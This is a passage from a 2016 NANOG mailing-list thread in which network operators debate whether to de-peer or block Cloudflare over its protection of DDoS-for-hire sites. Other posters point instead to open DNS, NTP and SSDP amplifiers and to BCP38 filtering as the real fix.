provider, a DNS provider, or anything else.  Nobody gets to shrug it
off with "Well, but..."

Second, nobody *can* get a pass, because the people behind these operations
have long since learned to distribute their assets widely -- in an attempt
to avoid exactly the actions in the first point.  And you know what?
It works.  "We're just hosting their email", says X, and "We're just
hosting their DNS", says Y, and "We're just hosting their web site",
says Z, and none of them do anything, and nothing gets done. 

The only way to make action against them effective is to do it broadly,
do it swiftly, and do it permanently.

---rsk

Re: Cloudflare, dirty networks and politricks

[Ca By]

On Thursday, July 28, 2016, Dovid Bender <do...@telecurve.com> wrote:

> The issue is that cloudfare in a way is generating their own market. If
> the ddos sites weren't protected by cloudfare they would eat each other
> alive. It's in their interest that their sites stay up so there is a need
> for their service. When GoDaddy hosts a bad site they aren't causing
> customer to sign up for the exact service for the protection they need from
> the bad site.
>
>
>
I feel the same way about all the ddos protection rackets. But i genuinely
feel Cloudflare is just a cdn that got good at fending off ddos just to
stay alive.

And they do a lot of good things with IPv6, dnssec, TLS 1.2++ , and open
source. It is not fair to blame them for our (network operators)
negligent open udp ampliers.

We are the real problems.

If Cloudflare did not host them, someone else would.

Perhaps only on tor.

But once you remove the open dns amplifiers, or put up the appropriate acls
(bcp38 + blocks obviously abused ssdp, dns, ntp to the extent you can)   ,
then you have really taking ddos capacity offline




> Regards,
>
> Dovid
>
> -Original Message-
> From: TR Shaw <ts...@oitc.com <javascript:;>>
> Sender: "NANOG" <nanog-boun...@nanog.org <javascript:;>>Date: Thu, 28 Jul
> 2016 19:45:14
> To: Donn Lasher<d.las...@f5.com <javascript:;>>
> Cc: nanog@nanog.org <javascript:;><nanog@nanog.org <javascript:;>>
> Subject: Re: Cloudflare, dirty networks and politricks
>
>
> > On Jul 28, 2016, at 7:30 PM, Donn Lasher via NANOG <nanog@nanog.org
> <javascript:;>> wrote:
> >
> > On 7/28/16, 10:17 AM, "NANOG on behalf of J. Oquendo" <
> nanog-boun...@nanog.org <javascript:;> on behalf of joque...@e-fensive.net
> <javascript:;>> wrote:
> >
> >
> >> While many are chanting: #NetworkLivesMatter, I have yet
> >> to see, read, or hear about any network provider being
> >> the first to set precedence by either de-peering, or
> >> blocking traffic from Cloudflare. There is a lot of
> >> keyboard posturing: "I am mad and I am not going to take
> >> it anymore" hooplah but no one is lifting a finger to
> >> do anything other than regurgitate "I am mad... This is
> >> criminal."
> >
> > (long discussion, was waiting for a place to jump in..)
> >
> > If we want to be accurate about it, Cloudflare doesn’t host the DDoS,
> they protect the website of seller of the product. We shouldn’t be
> de-peering Cloud Flare over sites they protect any more than we would
> de-peer GoDaddy over sites they host, some of which, no doubt, sell
> gray/black market/illegal items/services.
> >
> > If, on the other hand,  you can find a specific network actually
> generating the volumes of DDoS, you should have a conversation about
> de-peering….
> >
> > $0.02…
> >
>
> It would be nice however if Cloudflare would announce there “freebie”
> ciders and the IP block that host their paying customers. Most of the abuse
> centers on the free clients.
>
>

Re: Cloudflare, dirty networks and politricks

[Dovid Bender]

The issue is that cloudfare in a way is generating their own market. If the 
ddos sites weren't protected by cloudfare they would eat each other alive. It's 
in their interest that their sites stay up so there is a need for their 
service. When GoDaddy hosts a bad site they aren't causing customer to sign up 
for the exact service for the protection they need from the bad site.

  
Regards,

Dovid

-Original Message-
From: TR Shaw <ts...@oitc.com>
Sender: "NANOG" <nanog-boun...@nanog.org>Date: Thu, 28 Jul 2016 19:45:14 
To: Donn Lasher<d.las...@f5.com>
Cc: nanog@nanog.org<nanog@nanog.org>
Subject: Re: Cloudflare, dirty networks and politricks


> On Jul 28, 2016, at 7:30 PM, Donn Lasher via NANOG <nanog@nanog.org> wrote:
> 
> On 7/28/16, 10:17 AM, "NANOG on behalf of J. Oquendo" 
> <nanog-boun...@nanog.org on behalf of joque...@e-fensive.net> wrote:
> 
> 
>> While many are chanting: #NetworkLivesMatter, I have yet
>> to see, read, or hear about any network provider being
>> the first to set precedence by either de-peering, or
>> blocking traffic from Cloudflare. There is a lot of
>> keyboard posturing: "I am mad and I am not going to take
>> it anymore" hooplah but no one is lifting a finger to
>> do anything other than regurgitate "I am mad... This is
>> criminal."
> 
> (long discussion, was waiting for a place to jump in..)
> 
> If we want to be accurate about it, Cloudflare doesn’t host the DDoS, they 
> protect the website of seller of the product. We shouldn’t be de-peering 
> Cloud Flare over sites they protect any more than we would de-peer GoDaddy 
> over sites they host, some of which, no doubt, sell gray/black market/illegal 
> items/services.
> 
> If, on the other hand,  you can find a specific network actually generating 
> the volumes of DDoS, you should have a conversation about de-peering….
> 
> $0.02…
> 

It would be nice however if Cloudflare would announce there “freebie” ciders 
and the IP block that host their paying customers. Most of the abuse centers on 
the free clients.

Re: Cloudflare, dirty networks and politricks

[Ca By]

On Thursday, July 28, 2016, Donn Lasher via NANOG  wrote:

> On 7/28/16, 10:17 AM, "NANOG on behalf of J. Oquendo" <
> nanog-boun...@nanog.org  on behalf of joque...@e-fensive.net
> > wrote:
>
>
> >While many are chanting: #NetworkLivesMatter, I have yet
> >to see, read, or hear about any network provider being
> >the first to set precedence by either de-peering, or
> >blocking traffic from Cloudflare. There is a lot of
> >keyboard posturing: "I am mad and I am not going to take
> >it anymore" hooplah but no one is lifting a finger to
> >do anything other than regurgitate "I am mad... This is
> >criminal."
>
> (long discussion, was waiting for a place to jump in..)
>
> If we want to be accurate about it, Cloudflare doesn’t host the DDoS, they
> protect the website of seller of the product. We shouldn’t be de-peering
> Cloud Flare over sites they protect any more than we would de-peer GoDaddy
> over sites they host, some of which, no doubt, sell gray/black
> market/illegal items/services.
>
> If, on the other hand,  you can find a specific network actually
> generating the volumes of DDoS, you should have a conversation about
> de-peering….
>
> $0.02…
>
>
>
Agreed. Cloudflare is just the messenger

The ddos is coming from your ssdp, dns, and ntp servers. Not Cloudflare.

I see a lot of ddos traffic.

It is always udp

Comcast took a huge step in stemming the ssdp problem in their network,
http://labs.comcast.com/preventing-ssdp-abuse

Thanks Comcast!

But they still host tens of thousands, perhaps more, open dns resolvers
that attack us.

Re: Cloudflare, dirty networks and politricks

[Owen DeLong]

> On Jul 28, 2016, at 7:30 PM, Donn Lasher via NANOG  wrote:
> 
> On 7/28/16, 10:17 AM, "NANOG on behalf of J. Oquendo" 
>  wrote:
> 
> 
>> While many are chanting: #NetworkLivesMatter, I have yet
>> to see, read, or hear about any network provider being
>> the first to set precedence by either de-peering, or
>> blocking traffic from Cloudflare. There is a lot of
>> keyboard posturing: "I am mad and I am not going to take
>> it anymore" hooplah but no one is lifting a finger to
>> do anything other than regurgitate "I am mad... This is
>> criminal."
> 
> (long discussion, was waiting for a place to jump in..)
> 
> If we want to be accurate about it, Cloudflare doesn’t host the DDoS, they 
> protect the website of seller of the product. We shouldn’t be de-peering 
> Cloud Flare over sites they protect any more than we would de-peer GoDaddy 
> over sites they host, some of which, no doubt, sell gray/black market/illegal 
> items/services.
> 
> If, on the other hand,  you can find a specific network actually generating 
> the volumes of DDoS, you should have a conversation about de-peering….
> 
> $0.02…

On one hand, I agree with you… “We should no more de-peer Cloud Flare over 
sites they protect than we would de-peer GoDaddy over sites they host.”

However, if GoDaddy or Cloud Flare consistently refused to take down sites 
which specifically sell malicious activities as a service, I see no reason not 
to consider de-peering either one of them.

I’m not well enough versed in the exact details of the alleged 
actions/non-actions of CF in this scenario, but the idea that we should not 
apply rational peer pressure against the accessible indirect party in favor of 
playing whack-a-mole with the less accessible directly offending party seems 
patently absurd to me.

The actual dDOS is probably not even performed by the company advertising the 
service, but rather by one ore more bot-nets that they either directly control 
(pwn, but don’t own) or contract (someone else pwned the machines and sells bot 
services to them).

It’s one thing if a site is advertising legitimate load or stress testing 
abilities and is conducting itself in an ethical manner.

Its an entirely different matter if the site is advertising their ability to 
carry out malicious attacks for hire (e.g. “We can take down XYZ for mere 
pennies per hour.”, etc.).

In the latter case, I would expect any ethical company that found themselves 
hosting such content to take swift action against such a customer for TOS/AUP 
violation. In the former, there’s likely nothing wrong there and while you may 
not like what they do, it may well be a legitimate service, none-the-less.

Now there is a bit of a grey area which probably merits consideration… What if 
company A runs a web-site. They are a transit customer of company B. Company C 
is the VPS hosting company which is under contract to company D to provide 
machines and bandwidth for their “Security Testing Products.”.

(Quick cheat-diagram to make the rest easier to follow)
[Web Site A] <-> [Transit B] <-> {internet} <-> [VPS Host C] <-> [“Security 
Contractor” D]

Suppose company A dramatically overestimates their needed stress level for a 
traffic test and contracts company D to send them a stress test which turns out 
to overwhelm the peering between B and C.

Clearly, this is problematic to both B and C, but it’s not clear that it’s an 
actual violation or that either A or D has actually done anything wrong, per 
se. I would expect D to cease and desist promptly upon notification from C or 
A. Ideally they would also politely cease and desist upon credible request from 
company B, but the definition of credible is somewhat difficult here and may be 
subjective (B will generally consider themselves credible whether C does or 
not).

The problem may extend further, depending on whether B and C are directly 
peered or are connected via some additional set of transit networks in between. 
(see footnote [1]  for exact definitions of peering and transit intended in 
this message. Short version: packet flow, not money).

Obviously the more transit networks impacted, the more complex the issue 
becomes.

Owen

[1]
peering: The advertising of routes to and acceptance of packets for ones own 
autonomous system(s) and those autonomous systems for which you provide transit.
transit: The advertising of all known routes, default, or some superset of the 
above definition of peering and the willingness to accept, carry, and pass 
along packets destined to other peers and/or transit providers beyond the 
limits set by peering above.

Re: Cloudflare, dirty networks and politricks

[TR Shaw]

> On Jul 28, 2016, at 7:30 PM, Donn Lasher via NANOG  wrote:
> 
> On 7/28/16, 10:17 AM, "NANOG on behalf of J. Oquendo" 
>  wrote:
> 
> 
>> While many are chanting: #NetworkLivesMatter, I have yet
>> to see, read, or hear about any network provider being
>> the first to set precedence by either de-peering, or
>> blocking traffic from Cloudflare. There is a lot of
>> keyboard posturing: "I am mad and I am not going to take
>> it anymore" hooplah but no one is lifting a finger to
>> do anything other than regurgitate "I am mad... This is
>> criminal."
> 
> (long discussion, was waiting for a place to jump in..)
> 
> If we want to be accurate about it, Cloudflare doesn’t host the DDoS, they 
> protect the website of seller of the product. We shouldn’t be de-peering 
> Cloud Flare over sites they protect any more than we would de-peer GoDaddy 
> over sites they host, some of which, no doubt, sell gray/black market/illegal 
> items/services.
> 
> If, on the other hand,  you can find a specific network actually generating 
> the volumes of DDoS, you should have a conversation about de-peering….
> 
> $0.02…
> 

It would be nice however if Cloudflare would announce there “freebie” ciders 
and the IP block that host their paying customers. Most of the abuse centers on 
the free clients.

Re: Cloudflare, dirty networks and politricks

[Donn Lasher via NANOG]

On 7/28/16, 10:17 AM, "NANOG on behalf of J. Oquendo"  wrote:


>While many are chanting: #NetworkLivesMatter, I have yet
>to see, read, or hear about any network provider being
>the first to set precedence by either de-peering, or
>blocking traffic from Cloudflare. There is a lot of
>keyboard posturing: "I am mad and I am not going to take
>it anymore" hooplah but no one is lifting a finger to
>do anything other than regurgitate "I am mad... This is
>criminal."

(long discussion, was waiting for a place to jump in..)

If we want to be accurate about it, Cloudflare doesn’t host the DDoS, they 
protect the website of seller of the product. We shouldn’t be de-peering Cloud 
Flare over sites they protect any more than we would de-peer GoDaddy over sites 
they host, some of which, no doubt, sell gray/black market/illegal 
items/services.

If, on the other hand,  you can find a specific network actually generating the 
volumes of DDoS, you should have a conversation about de-peering….

$0.02…

Re: Cloudflare, dirty networks and politricks

[Seth Mattinen]

On 7/28/16 12:01, McDonald Richards wrote:

Feel free to demonstrate to us all how you're leading by example.

Until then, as a consumer of "the Internet", I'd like my any-to-any access
to remain that way.



Again, and that's why these problems are such as they are.

~Seth

Re: Cloudflare, dirty networks and politricks

[J. Oquendo]

On Thu, 28 Jul 2016, Stephen Satchell wrote:

> Let's supposed someone did indeed de-peer or otherwise block Cloudflare 
> from their entire network.
> 
> Which of y'all would be the first to say to that network operator, "Hope 
> you enjoy your intranet"?

Really? Again more boogeyman nonsense. The world does not
revolve around Cloudflare or any other provider. If I were
a customer, and my customers could not reach me, I would
go to my provider. If I discovered my provider was being
unethical in their practice, I would be an idiot to stay
with them. "Hey its ok for me to conduct eCommerce
transactions. I mean they're only allowing DoS, malware,
ransomware."

Tell me how would that work for you when your clients
started jumping ship because your network is dirty. Again
I go back to square one... The responders ("No you can
never!!!") are those who truly could care less about the
current state of garbage on the net. Masquerading it along
the lines of:

"Ermahgerd WAR!!!"
"OMG YOU WILL ONLY HAVE AN INTRANET"
"You can't be serious!!!"


-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

"Where ignorance is our master, there is no possibility of
real peace" - Dalai Lama

0B23 595C F07C 6092 8AEB  074B FC83 7AF5 9D8A 4463
https://pgp.mit.edu/pks/lookup?op=get=0xFC837AF59D8A4463

Re: Cloudflare, dirty networks and politricks

[McDonald Richards]

Feel free to demonstrate to us all how you're leading by example.

Until then, as a consumer of "the Internet", I'd like my any-to-any access
to remain that way.



On Thu, Jul 28, 2016 at 11:52 AM, Seth Mattinen  wrote:

> On 7/28/16 11:24, McDonald Richards wrote:
>
>> Be sure to let us all know how this works out for your business.
>>
>
>
> And that's why these problems are such as they are.
>
> ~Seth
>

Re: Cloudflare, dirty networks and politricks

[Seth Mattinen]

On 7/28/16 11:24, McDonald Richards wrote:

Be sure to let us all know how this works out for your business.



And that's why these problems are such as they are.

~Seth

Re: Cloudflare, dirty networks and politricks

[Stephen Satchell]

On 07/28/2016 10:17 AM, J. Oquendo wrote:

While many are chanting: #NetworkLivesMatter, I have yet
to see, read, or hear about any network provider being
the first to set precedence by either de-peering, or
blocking traffic from Cloudflare. There is a lot of
keyboard posturing: "I am mad and I am not going to take
it anymore" hooplah but no one is lifting a finger to
do anything other than regurgitate "I am mad... This is
criminal."


Let's supposed someone did indeed de-peer or otherwise block Cloudflare 
from their entire network.


Which of y'all would be the first to say to that network operator, "Hope 
you enjoy your intranet"?

Re: Cloudflare, dirty networks and politricks

[J. Oquendo]

On Thu, 28 Jul 2016, McDonald Richards wrote:

> Be sure to let us all know how this works out for your business.
> 
> On Thu, Jul 28, 2016 at 10:35 AM, J. Oquendo  wrote:
> 

As stated... "Networkers don't give a rats ass about
ethics/morals. Solely a fistful of dollars"

In the interim, this conversation differs little from
fergdawg's "How to Handle ISPs Who Turn a Blind Eye to
Criminal Activity?"

https://www.nanog.org/mailinglist/mailarchives/old_archive/2007-10/msg00348.html

Back to what matters now... Money, because cybercrime meh.

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

"Where ignorance is our master, there is no possibility of
real peace" - Dalai Lama

0B23 595C F07C 6092 8AEB  074B FC83 7AF5 9D8A 4463
https://pgp.mit.edu/pks/lookup?op=get=0xFC837AF59D8A4463

Re: Cloudflare, dirty networks and politricks

[McDonald Richards]

Be sure to let us all know how this works out for your business.

On Thu, Jul 28, 2016 at 10:35 AM, J. Oquendo  wrote:

> On Thu, 28 Jul 2016, Naslund, Steve wrote:
>
> > You obviously have a much shorter Internet memory than some of the
> engineers on here that have had a long history of killing off and
> blacklisting various spam and malware operations over the years.  I think
> the one thing that has changed is that the service providers are now large
> corporate entities that do not take going to war with each other as lightly
> as we did back in the day.
> >
> > Steven Naslund
> > Chicago IL
>
> It is this same attitude that throws everything into the
> loop we are seeing: "Well Mega Corporation is allowing it
> and we can't stop them lest we want to go to war with
> them." Define war. What will they do if you de-peer? They
> will find another provider to peer with it. That is it.
> There is no "war" no one is coming to our offices in full
> military gear. The more you guys allow this, the more it
> will continue.
>
> Start de-peering companies similar to BGP Dampening. "Oh
> didn't respond to our Nthousandth abuse. De-peered for N
> amount of time. Increment the time, and when some of these
> providers start seeing the cost of associating with these
> types of crimes (spam, malware), they have a choice, ship
> in or ship out. If ALL PROVIDERS did the same, who would
> a dirty host have left to peer with?
>
> Any other answer is nonsense and an excuse... "This will
> start a war!!!" Nonsense and quite possibly the sorriest
> excuse I have read for lifting a finger. 100 more people
> with the same response, means nothing will ever get done.
> OTOH ... Let's go back to "OMG THIS HAS TO STOP BUT I AM
> NOT GOING TO BE THE ONE LIFTING A FINGER!!! Because...
> ERMAHGERD WAR"
>
>
>
> --
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
> J. Oquendo
> SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM
>
> "Where ignorance is our master, there is no possibility of
> real peace" - Dalai Lama
>
> 0B23 595C F07C 6092 8AEB  074B FC83 7AF5 9D8A 4463
> https://pgp.mit.edu/pks/lookup?op=get=0xFC837AF59D8A4463
>

Re: Cloudflare, dirty networks and politricks

[J. Oquendo]

On Thu, 28 Jul 2016, Naslund, Steve wrote:

> You obviously have a much shorter Internet memory than some of the engineers 
> on here that have had a long history of killing off and blacklisting various 
> spam and malware operations over the years.  I think the one thing that has 
> changed is that the service providers are now large corporate entities that 
> do not take going to war with each other as lightly as we did back in the day.
> 
> Steven Naslund
> Chicago IL

It is this same attitude that throws everything into the
loop we are seeing: "Well Mega Corporation is allowing it
and we can't stop them lest we want to go to war with
them." Define war. What will they do if you de-peer? They
will find another provider to peer with it. That is it.
There is no "war" no one is coming to our offices in full
military gear. The more you guys allow this, the more it
will continue.

Start de-peering companies similar to BGP Dampening. "Oh
didn't respond to our Nthousandth abuse. De-peered for N
amount of time. Increment the time, and when some of these
providers start seeing the cost of associating with these
types of crimes (spam, malware), they have a choice, ship
in or ship out. If ALL PROVIDERS did the same, who would
a dirty host have left to peer with?

Any other answer is nonsense and an excuse... "This will
start a war!!!" Nonsense and quite possibly the sorriest
excuse I have read for lifting a finger. 100 more people
with the same response, means nothing will ever get done.
OTOH ... Let's go back to "OMG THIS HAS TO STOP BUT I AM
NOT GOING TO BE THE ONE LIFTING A FINGER!!! Because...
ERMAHGERD WAR"



-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

"Where ignorance is our master, there is no possibility of
real peace" - Dalai Lama

0B23 595C F07C 6092 8AEB  074B FC83 7AF5 9D8A 4463
https://pgp.mit.edu/pks/lookup?op=get=0xFC837AF59D8A4463

RE: Cloudflare, dirty networks and politricks

[Naslund, Steve]

You obviously have a much shorter Internet memory than some of the engineers on 
here that have had a long history of killing off and blacklisting various spam 
and malware operations over the years.  I think the one thing that has changed 
is that the service providers are now large corporate entities that do not take 
going to war with each other as lightly as we did back in the day.

Steven Naslund
Chicago IL

>-Original Message-
>From: J. Oquendo [mailto:joque...@e-fensive.net] 
>Sent: Thursday, July 28, 2016 12:17 PM
>To: Phil Rosenthal
>Cc: Naslund, Steve; nanog@nanog.org
>Subject: Cloudflare, dirty networks and politricks
>
>
>While many are chanting: #NetworkLivesMatter, I have yet to see, read, or hear 
>about any network provider being the first to set precedence by either 
>de-peering, or blocking traffic from Cloudflare. There is a lot of keyboard 
>>posturing: "I am mad and I am not going to take it anymore" hooplah but no 
>one is lifting a finger to do anything other than regurgitate "I am mad... 
>This is criminal."
>
>Government in the US is not going to get involved as the financial cost won't 
>warrant an investigation. Would you spend $100 to tow a car worth $1. 
>Cloudflare, Amazon, Rackspace, and countless others are, and have been 
>allowing the >same thing since the dawn of their creation and network 
>operators... Shame on you for allowing it.
>
>It is legal? Is it moral? Does it serve a real world benefit? (booters). Let's 
>get real these booters serve little purpose. Anyone can go back to romper room 
>and do the simple math: I have a 100mb pipe, if someone sends me 200mb >will 
>it flood me? A pre-schooler can give anyone the answer. Yet here is everyone 
>chiming in on legal matters when not one respondent that I have seen is a 
>lawyer.
>
>I wrote about this in my rambling which is linked in the NANOG LinkedIn group: 
>"Why Do Networking Providers Like Cybercriminals So Much" and the responses I 
>have read on this thread, make me believe it more so. Networking operators 
>>could give a rats ass about doing anything about DDoS, viruses. etc., since 
>it is a source of revenue down the daisy chain. Like it or not. I would be 
>surprised if ANYONE in this NOG, or any other "NOG" de-peered out of 
>principle. >With that said, I don't even know why this thread is being 
>continued. 
>
>
>--
>=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>J. Oquendo
>SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM